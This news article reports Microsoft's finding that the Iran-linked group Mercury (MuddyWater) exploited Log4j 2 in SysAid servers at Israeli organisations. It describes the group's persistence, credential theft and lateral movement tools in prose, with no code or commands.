Microsoft observes Iranian-based Mercury hackers exploiting Log4j 2 vulnerabilities across Israeli organizations

Iran-based threat group Mercury has been exploiting Log4j 2 vulnerabilities in SysAid applications across Israeli organizations, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team said in a recent blog post. MSTIC also assesses with high confidence that Mercury’s observed activity was affiliated with Iran’s Ministry of Intelligence and Security (MOIS).

“According to the US Cyber Command, MuddyWater, a group we track as MERCURY, ‘is a subordinate element within the Iranian Ministry of Intelligence and Security,’” the Microsoft blog post disclosed. Furthermore, the researchers at the software giant assess with moderate confidence that Mercury hackers exploited remote code execution vulnerabilities in Apache Log4j 2 across vulnerable SysAid Server instances the targets were running. The blog post said Mercury has also used Log4j 2 exploits in past campaigns. 

While Mercury has used Log4j 2 exploits in the past, such as on vulnerable VMware apps, Microsoft has not seen the hacker group using SysAid apps as a vector for initial access until now, it adds. “After gaining access, MERCURY establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack.”

“On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector,” the Microsoft researchers disclosed. “Based on observations from past campaigns and vulnerabilities found in target environments, Microsoft assess that the exploits used were most likely related to Log4j 2. The threat actor leveraged Log4j 2 exploits against VMware applications earlier in 2022 and likely looked for similarly vulnerable internet-facing apps. SysAid, which provides IT management tools, might have presented as an attractive target for its presence in the targeted country.”

In February, the U.S. Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Cyber Command Cyber National Mission Force (CNMF), along with the U.K.’s National Cyber Security Centre (NCSC-UK), provided details of malicious cyber operations by Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater. 

The joint cybersecurity alert identified at the time that MuddyWater is conducting cyber espionage and other malicious cyber operations as part of Iran’s MOIS, targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. 

Microsoft said in its post that exploiting SysAid enables the hacker to drop and leverage web shells to execute several commands. Most commands are related to reconnaissance, with one encoded PowerShell that downloads the actor’s tool for lateral movement and persistence.

Once Mercury has obtained access to the target organization, the hacker establishes persistence using several methods. The techniques include dropping a web shell, providing effective and continued access to the compromised device, or adding a user and elevating their privileges to local administrator. It has also been observed that adding the leveraged tools in the startup folders and ASEP registry keys, ensures their persistence upon device reboot and stealing credentials.

“The actor leverages the new local administrator user to connect through remote desktop protocol (RDP),” Microsoft said. “During this session, the threat actor dumps credentials by leveraging the open-source application Mimikatz. We also observed MERCURY later performing additional credential dumping in SQL servers to steal other high privileged accounts, like service accounts.”

Microsoft also observed Mercury further using its foothold to compromise other devices within the target organizations by leveraging several methods, such as Windows Management Instrumentation (WMI) to launch commands on devices within organizations, and remote services leveraging RemCom tool to run encoded PowerShell commands within organizations. However, the post adds that most of the commands launched are meant to install tools on targets or perform reconnaissance to find domain administrator accounts.

Throughout the attack, Microsoft observed that the hackers used different methods to communicate with their command-and-control (C2) server, including built-in operating system tools such as PowerShell, tunneling tool called vpnui[dot]exe, a version of the open-source tool Ligolo, and remote monitoring and management software called eHorus. “Microsoft will continue to monitor MERCURY activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below,” it adds.

Mercury has a long history of spear-phishing targets. Recently, there has been an uptick in these phishing attacks. The source is compromised mailboxes and initiating conversations with targets. Additionally, Mercury operators include links to commercial remote access tools, such as ScreenConnect, in these initial phishing emails.

“MERCURY utilizes commercially available file-sharing services as well as self-hosting resources for delivering payloads,” the Microsoft researchers said. “The initial foothold on victims emerges via commercially available remote access applications. This allows MERCURY to gain elevated privileges and be able to transfer files, primarily PowerShell scripts, easily over to the victim’s environment.”

Microsoft also said that Mercury’s tools of choice tend to be Venom proxy tool, Ligolo reverse tunneling, and home-grown PowerShell programs. “MERCURY targets a variety of Middle Eastern-geolocated organizations. Mailbox victims correlate directly with organizations that do business with the Middle Eastern victims,” it adds.

In March, Cisco Talos researchers observed cyber attackers targeting Turkey and other Asian countries that they believe with high confidence are from groups operating under the MuddyWater umbrella of advanced persistent threat (APT) groups. The MuddyWater hackers are believed to be ‘a conglomerate of multiple teams operating independently rather than a single threat actor group’ and conduct campaigns against various industries, including national and local governments and ministries, universities, and private entities, such as telecommunication providers.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.